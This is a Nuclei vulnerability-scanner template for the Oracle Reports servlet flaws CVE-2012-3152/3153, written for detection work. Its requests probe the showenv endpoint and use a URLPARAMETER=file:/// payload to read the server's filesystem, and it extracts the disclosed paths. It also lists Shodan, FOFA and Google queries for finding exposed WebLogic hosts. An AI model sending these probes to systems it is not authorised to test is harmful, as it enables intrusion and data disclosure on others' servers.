nuclei-templates/http/cves/2012/CVE-2012-3153.yaml

74 lines
2.5 KiB
YAML

id: CVE-2012-3153
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
author: Sid Ahmed MALAOUI @ Realistic Security
severity: medium
description: |
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
vectors related to Report Server Component.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
remediation: |
Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
- https://www.oracle.com/security-alerts/cpuoct2012.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2012-3153
cwe-id: NVD-CWE-noinfo
epss-score: 0.95986
epss-percentile: 0.99471
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: fusion_middleware
shodan-query:
- http.title:"weblogic"
- http.html:"weblogic application server"
fofa-query:
- title="weblogic"
- body="weblogic application server"
google-query: intitle:"weblogic"
tags: cve,cve2012,oracle,rce,edb
http:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Reports Servlet")'
- type: dsl
dsl:
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"
# digest: 490a00463044022073b059f06469d58c867070e171a4533bb976f5775453e911a3c02a02e0f7648b0220210d93050cb989bbd9f6a41297ef913318659adb3a0fdb23d50c031072dd0ada:922c64590222798bb761d5b6d8e72950